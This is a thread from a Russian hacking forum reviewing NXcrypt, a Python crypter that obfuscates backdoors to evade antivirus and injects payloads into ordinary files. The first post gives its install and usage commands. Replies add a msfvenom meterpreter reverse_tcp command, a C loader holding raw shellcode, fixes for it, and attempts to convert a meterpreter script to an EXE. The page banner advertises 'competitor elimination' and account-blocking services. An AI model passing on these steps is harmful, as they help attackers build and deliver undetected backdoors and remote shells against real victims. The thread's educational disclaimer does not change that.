NXcrypt-python backdoor framework

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
NXcrypt-python backdoor framework

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

21.06.2017, 07:10

Vertigo

Познавший АНТИЧАТ

Регистрация: 27.02.2017

Сообщений: 1,312

С нами: 4845950

Репутация: 0

Информация,которая представлена в обзоре ,предназначена исключительно для ознакомления

и изучения информационной безопасности.

Администрация ресурса и автор обзора не призывают к её использованию в незаконных целях.

Приветсвую всех Форумчан,Дорогих постоянных гостей нашего ресурса и тех,кого интересует ИБ.
Буквально,несколько дней назад,Hadi опубликовал великолепную ,на мой взгляд работу.

Это полиморфный Криптор,обладающий своими модулями шифрования и инжекта.
Он использует внутренний модуль python py_compile , компилирует код в байт-код файла .pyc file
И затем конвертирует этот файл в обычный .py,обфусцируя код таким образом,что меняется md5sum на выходе.

Модуль инжекта предназначен для ввода вредоносного файла python в обычный файл с многопотоковой системой.

Вот такой инструмент,обработанные файлы которым ,по состоянию на текущий момент,не детектятся AV.
Удобен он конечно в совместной работе с Metasploit.
Никаких особенных зависимостей и предпочтений Linux-дистрибутивов не имеет.

Ну чтож,приступим:

Код:

Код:

git clone https://github.com/Hadi999/NXcrypt.git
cd NXcrypt/
chmod +x NXcrypt.py
sudo ./NXcrypt.py --help (криптор требует работу от рута)

Опции можно посмотреть на скриншоте

Применение и алгоритмы команд:

Код:

Код:

sudo ./NXcrypt.py --file=backdoor.py --output=output_backdoor.py # encrypt backdoor.py and output file is output_backdoor.py
    sudo ./NXcrypt.py --file=shell.py # encrypt shell.py and default output file is backdoor.py but you can edit it in source code
    sudo ./NXcrypt.py --help # NXcrypt help
    sudo ./NXcrypt.py --backdoor-file=payload.py --file=test.py --output=hacked.py # inject payload.py with test.py into hacked.py with multi-threading system

Прилагаю также видео от автора,где можно посмотреть работу на примере генерирования полезной нагрузки с помощьюmsfvenom.

Ну ,а я на этом желаю вам отличного настроения и до новых встреч.

𝕏 Twitter Reddit Telegram Копировать ссылку

21.06.2017, 11:24

Ondrik8

Новичок

Регистрация: 08.11.2016

Сообщений: 0

С нами: 5005666

Репутация: 0

Молодца!) хачу ищо!))

21.06.2017, 14:37

Ondrik8

Новичок

Регистрация: 08.11.2016

Сообщений: 0

С нами: 5005666

Репутация: 0

Цитата:

Hackaton192 сказал(а):

А чем можно конвертнуть потом Python в Exe формат?

py2exe <--- о нем

21.06.2017, 23:53

Vertigo

Познавший АНТИЧАТ

Регистрация: 27.02.2017

Сообщений: 1,312

С нами: 4845950

Репутация: 0

Цитата:

Ondrik8 сказал(а):

Молодца!) хачу ищо!))

Пока небольшой тайм-аут)) Не один же автор обзоров.Неделя,надо отметить,
удалась урожайной по отменному материалу,хотя ещё не закончилась.
Коллег всегда приятно читать,узнавать новое,а это отдых и чувство комфорта.
За ссылку спасибо на py2exe-отличное дополнение темы.

22.06.2017, 12:47

yvv4recon

Новичок

Регистрация: 21.06.2017

Сообщений: 0

С нами: 4681779

Репутация: 0

Люди добрый, нужен совет!
1)Из metasploit получаю shellcode:
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -b \0x0a\0x0b\0xff -f c > /home/iam/shellcode.c
2) Затем пытаюсь запустить.
#include
#include

unsigned char code[] =
"\x48\x31\xc9\x48\x81\xe9\xf7\xff\xff\xff\x48\x8d\ x05\xef\xff"
"\xff\xff\x48\xbb\x83\xa9\xe9\x96\xd1\x41\xaa\xc9\ x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xcb\x98\x16\ xfc\xd8\x19"
"\x33\x7f\x93\xe1\x60\x40\x9c\x70\x63\xa3\xa1\xe8\ xb3\x24\xd6"
"\x4e\xaf\x9f\xd3\xc3\xc0\xce\x48\x2b\xa8\x96\xe9\ xa8\xb7\x99"
"\xd4\x09\x3d\x81\x3a\xab\xe9\xa6\xe8\x81\x02\xdb\ x32\xf8\xa1"
"\x1f\x37\x2b\xba\x93\xe9\x83\xb1\x99\xd4\x18\xf4\ x93\x8c\xac"
"\x16\x70\xd1\x41\xaa\xc9";

int main(void) {
printf("Shellcode length: %dn", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();

return 0;
}

НО ОН ВОЗВРАЩАЕТ SEGMENTATION FAULT

В чем может быть дело?

23.06.2017, 16:09

Vertigo

Познавший АНТИЧАТ

Регистрация: 27.02.2017

Сообщений: 1,312

С нами: 4845950

Репутация: 0

Цитата:

yvv4recon сказал(а):

В чем может быть дело?

Параметры LHOST,LPORT и др.указываются только заглавными.
С портом понятно,что для примера.
Попробуйте вначале так:
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=12345 -a x86 --platform Linux -f c
#include
#include
Т.е. ,без отсечения -b (вредных символов)

23.06.2017, 17:58

IF_ELSE

Новичок

Регистрация: 13.06.2017

Сообщений: 24

С нами: 4693070

Репутация: 0

Спасибо, очень познавательно! Попробовал конвертировать при помощи утилы py2exe - вываливает ошибку такого плана

c:\Python27>python setup.py py2exe
running py2exe
creating c:\Python27\build
creating c:\Python27\build\bdist.win-amd64
creating c:\Python27\build\bdist.win-amd64\winexe
creating c:\Python27\build\bdist.win-amd64\winexe\collect-2.7
creating c:\Python27\build\bdist.win-amd64\winexe\bundle-2.7
creating c:\Python27\build\bdist.win-amd64\winexe\temp
creating c:\Python27\dist
*** searching for required modules ***
error: compiling 'meterpreter2.py' failed
TypeError: compile() expected string without null bytes

Может кто из форумчан сталкивался? Гуглить пробовал, но решения так и не нашел.

23.06.2017, 21:32

kot-gor

Новичок

Регистрация: 07.09.2016

Сообщений: 0

С нами: 5095710

Репутация: 0

Цитата:

IF_ELSE сказал(а):

Спасибо, очень познавательно! Попробовал конвертировать при помощи утилы py2exe - вываливает ошибку такого плана

c:\Python27>python setup.py py2exe
running py2exe
creating c:\Python27\build
creating c:\Python27\build\bdist.win-amd64
creating c:\Python27\build\bdist.win-amd64\winexe
creating c:\Python27\build\bdist.win-amd64\winexe\collect-2.7
creating c:\Python27\build\bdist.win-amd64\winexe\bundle-2.7
creating c:\Python27\build\bdist.win-amd64\winexe\temp
creating c:\Python27\dist
*** searching for required modules ***
error: compiling 'meterpreter2.py' failed
TypeError: compile() expected string without null bytes

Может кто из форумчан сталкивался? Гуглить пробовал, но решения так и не нашел.

у меня тоже не вышло сконвертировать причем как в винде так и в линуксе..буду признателен, если у кого получилось, поделится опытом..

24.06.2017, 12:33

Vertigo

Познавший АНТИЧАТ

Регистрация: 27.02.2017

Сообщений: 1,312

С нами: 4845950

Репутация: 0

Цитата:

Vertigo сказал(а):

Параметры LHOST,LPORT и др.указываются только заглавными.
С портом понятно,что для примера.
Попробуйте вначале так:
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=12345 -a x86 --platform Linux -f c
#include
#include
Т.е. ,без отсечения -b (вредных символов)

Архитектору только требуемую не забудьте указать (у Вас x64)

#10

28.06.2017, 16:56

flesh91

Новичок

Регистрация: 16.06.2017

Сообщений: 0

С нами: 4688348

Репутация: 0

Хочу узнать получилось ли кому то конвертировать в EXE так как у меня такая же ошибка как у форумчан выше: "TypeError: compile() expected string without null bytes"

Страница 1 из 2

Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход